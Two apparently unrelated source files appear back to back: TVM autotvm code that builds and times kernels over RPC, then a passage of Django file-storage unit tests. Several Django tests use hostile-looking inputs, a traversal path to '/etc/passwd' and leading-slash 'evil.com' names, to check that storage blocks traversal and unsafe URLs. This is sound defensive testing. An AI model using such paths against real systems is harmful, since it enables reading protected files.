The number of tasks run in parallel. "None" will use all cpu cores
build_func: callable or str
If is 'default', use default build function
If is 'ndk', use function for android ndk
If is callable, use it as custom build function, expect lib_format field.
"""
def __init__(self, timeout=10, n_parallel=None, build_func='default'):
super(LocalBuilder, self).__init__(timeout, n_parallel)
if isinstance(build_func, str):
if build_func == 'default':
build_func = tar.tar
elif build_func == 'ndk':
build_func = ndk.create_shared
elif build_func == 'g++':
build_func = cc.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
self.build_func = _wrap_build_func(build_func)
self.executor = LocalExecutor(timeout=timeout)
self.tmp_dir = tempfile.mkdtemp()
def build(self, measure_inputs):
results = []
shutil.rmtree(self.tmp_dir, ignore_errors=True)
self.tmp_dir = tempfile.mkdtemp()
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for inp in measure_inputs[i:i + self.n_parallel]:
ret = self.executor.submit(self.build_func,
inp,
self.tmp_dir,
**self.build_kwargs)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception):
# timeout or fleet error, return MeasureResult directly
results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
self.timeout, time.time()))
elif res.error is not None:
# instantiation error
if isinstance(res.error, InstantiationError):
results.append(MeasureResult((res.error,),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else:
if "InstantiationError" in str(res.error):
msg = str(res.error)
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
results.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else: # tvm error
results.append(MeasureResult((res.error,),
MeasureErrorNo.COMPILE_HOST,
res.time_cost, time.time()))
else:
# return BuildResult
results.append(res)
return results
class RPCRunner(Runner):
"""Run generated code on remove devices.
This function will ask a RPC Tracker to get device for measurement.
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
key: str
The key of the device registered in the tracker
host: str
The host address of RPC Tracker
port: int
The port of RPC Tracker
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first "1" is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
"""
def __init__(self,
key, host, port, priority=1,
timeout=10, n_parallel=None,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(RPCRunner, self).__init__(timeout, n_parallel)
self.key = key
self.host = host
self.port = port
self.priority = priority
self.timeout = timeout
self.number = number
self.repeat = repeat
self.min_repeat_ms = min_repeat_ms
self.ref_input = None
self.ref_output = None
self.check_correctness = check_correctness
self.cooldown_interval = cooldown_interval
self.executor = LocalExecutor()
def set_task(self, task):
self.task = task
if check_remote(task.target, self.key, self.host, self.port):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
if self.check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in self.ref_input]
func(*tvm_buf)
self.ref_output = [x.asnumpy() for x in tvm_buf]
def get_build_kwargs(self):
kwargs = {}
if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
'rocm' in self.task.target.keys or 'vulkan' in self.task.target.keys:
remote = request_remote(self.key, self.host, self.port)
ctx = remote.context(str(self.task.target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in self.task.target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
if self.task.target.device_name == 'micro_dev':
kwargs.setdefault('build_option', {})['tir.disable_vectorize'] = True
return kwargs
def run(self, measure_inputs, build_results):
results = []
remote_args = (self.key, self.host, self.port, self.priority, self.timeout)
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
build_results[i:i+self.n_parallel]):
ret = self.executor.submit(run_through_rpc,
measure_inp,
build_res,
self.number,
self.repeat,
self.min_repeat_ms,
self.cooldown_interval,
remote_args,
self.ref_input,
self.ref_output)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception): # executor error or timeout
results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
self.timeout, time.time()))
else:
results.append(res)
return results
class LocalRunner(RPCRunner):
"""Run generated code on local devices.
Parameters
----------
timeout: float
The timeout of a compilation
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
Note
----
This is a "fake" local mode. We start a silent rpc tracker and rpc server
for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
"""
def __init__(self,
timeout=10,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(LocalRunner, self).__init__('', None, None, 0,
timeout=timeout, n_parallel=1,
number=number, repeat=repeat,
min_repeat_ms=min_repeat_ms,
cooldown_interval=cooldown_interval,
check_correctness=check_correctness)
self.tracker = None
self.server = None
def set_task(self, task):
# pylint: disable=import-outside-toplevel
from ...rpc.tracker import Tracker
from ...rpc.server import Server
self.task = task
tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('0.0.0.0', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
self.key = device_key
self.host = tracker.host
self.port = tracker.port
super(LocalRunner, self).set_task(task)
return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
"""Common part for building a configuration"""
target, task, config = measure_input
with target:
s, args = task.instantiate(config)
# check invalidity of template and code hash consistency
if not config.valid():
raise InstantiationError(config.errors)
opts = build_option or {}
if check_gpu: # Add verify pass to filter out invalid configs in advance.
opts["tir.add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
if cuda_arch:
set_cuda_target_arch(cuda_arch)
# if target is vta, we need to use vta build
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
import vta
func = vta.build(s, args, target_host=task.target_host)
else:
with tvm.ir.transform.PassContext(config=opts):
func = build(s, args, target_host=task.target_host)
return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
"""
Wrap build_func to a function that can be used in measure.
Parameters
----------
build_func : The compilation function
We expect fcompile to contain an attr "output_format"
Returns
-------
wrapped_build_func : function
The wrapped build function
"""
if not hasattr(build_func, "output_format"):
raise AttributeError("Expect build_func to have the attribute output_format.")
output_format = build_func.output_format
def _wrapped(measure_input, tmp_dir, **kwargs):
"""
Wrapped build func.
Parameters
----------
measure_input: MeasureInput
The input of measurement
tmp_dir: str
The path of temporary directory to export generated library
"""
tic = time.time()
try:
filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
getrandbits(64), output_format))
# TODO(tvm-team) consider linline _build_func_common
func, arg_info = _build_func_common(measure_input, **kwargs)
func.export_library(filename, build_func)
except Exception as e: # pylint: disable=broad-except
return BuildResult(None, None, e, time.time() - tic)
return BuildResult(filename, arg_info, None, time.time() - tic)
return _wrapped
def run_through_rpc(measure_input, build_result,
number, repeat, min_repeat_ms, cooldown_interval,
remote_args, ref_input=None, ref_output=None):
"""Run a generated library through rpc
Parameters
----------
measure_input: MeasureInput
The raw measure input
build_result: BuildResult
The result returned from Builder. This contains the path to the generated library.
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float
The cool down interval between two measurements
remote_args: Tuple
The argument for request_remote
ref_input: List of np.ndarray
The reference input used for checking correctness
ref_output: List of np.ndarray
The reference output used for checking correctness
"""
if isinstance(build_result, MeasureResult):
return build_result
tic = time.time()
errno = MeasureErrorNo.NO_ERROR
try:
# upload built module
remote = request_remote(*remote_args)
# Program the FPGA every single time when targeting VTA
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
from vta import program_fpga, reconfig_runtime
program_fpga(remote, None)
reconfig_runtime(remote)
remote.upload(build_result.filename)
func = remote.load_module(os.path.split(build_result.filename)[1])
ctx = remote.context(str(measure_input.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
# set input
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
# create empty arrays on the remote device and copy them once.
# This can avoid some memory issues that make the measurement results unreliable.
args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
args = [nd.array(x, ctx=ctx) for x in args]
ctx.sync()
costs = time_f(*args).results
# clean up remote files
remote.remove(build_result.filename)
remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
remote.remove('')
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
#costs = tuple(costs[1:-1])
# check correctness of output
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "CUDA Source" in msg:
msg = msg[:msg.index("CUDA Source")]
costs = (RuntimeError(msg[:1024]),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
time.sleep(cooldown_interval)
return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
"""Request a remote session
Parameters
----------
device_key: string
The device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: second)
Returns
------
session: RPCSession
"""
# connect to the tracker
host = host or os.environ['TVM_TRACKER_HOST']
port = port or int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
Returns
-------
available: bool
True if can find available device
"""
def _check():
remote = request_remote(device_key, host, port, priority)
ctx = remote.context(str(target))
while not ctx.exist: # wait until we get an available device
pass
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
# e.g., target arch could be [
# "-gencode", "arch=compute_52,code=sm_52",
# "-gencode", "arch=compute_70,code=sm_70"
# ]
target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler
Parameters
----------
arch: str or list
The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
it can also be a count of gencode arguments pass to nvcc command line,
e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
"""
AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(f, *_):
valid = tvm.tir.analysis.verify_gpu_code(f, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return f
return tvm.tir.transform.prim_func_pass(verify_pass, opt_level=0)
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, 'error'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise OSError
f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overridden_media_root',
'MEDIA_URL': 'overridden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
